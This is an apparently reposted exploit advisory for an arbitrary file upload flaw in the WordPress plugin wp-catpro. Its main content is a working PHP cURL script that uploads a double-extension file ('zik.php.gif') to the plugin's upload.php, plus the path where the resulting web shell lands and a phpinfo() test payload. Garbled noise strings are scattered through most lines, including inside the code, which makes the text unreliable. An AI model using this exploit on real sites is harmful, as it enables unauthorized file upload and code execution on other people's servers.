WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
% }& k/ J0 M. {6 S2 _
作者  => Zikou-16
邮箱 => zikou16x@gmail.com
0 v1 r; c2 \4 I6 W3 F测试系统 : Windows 7 , Backtrack 5r3
- L0 L6 v* ~0 \4 T下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
7 s: }, q9 m& s; k####
7 L+ @$ F8 W& F6 l) }
( g6 F+ W% O. H$ @#=> Exploit 信息:
------------------
/ f3 J( T0 v9 I# j/ G( L+ h# 攻击者可以上传 file/shell.php.gif
" ]; S. H( i3 E# ("jpg", "gif", "png")  // Allowed file extensions
. T8 R& M- [, S# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
0 n' t& Q- ^, b  x# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
/ O" U( y! P" W
' i0 E+ R/ `+ u) o6 z) k#=> Exploit
/ @3 f5 F9 h" w' r- A3 W4 g-----------
" P; ^( R0 y5 E9 o+ h' O<?php

$uploadfile="zik.php.gif";
5 g' D& `) G! V' w" C$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
+ E) z5 g# B9 x" I6 fcurl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
6 b8 |, i, I  r! ]( t+ ~! ?' }. _array('Filedata'=>"@$uploadfile",
5 R/ r2 [: r/ m5 B3 p, x'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
& d  y8 [. ~" J. L/ Q$ f( `curl_close($ch);

) x6 O# `+ N3 a% t0 R( G6 j2 vprint "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
$ J% I+ r, w6 ?  ?>
! W% s1 ]; l2 \" D: u. A  M<?php
phpinfo();
$ n3 {0 }8 f% _) g5 h/ D2 [?>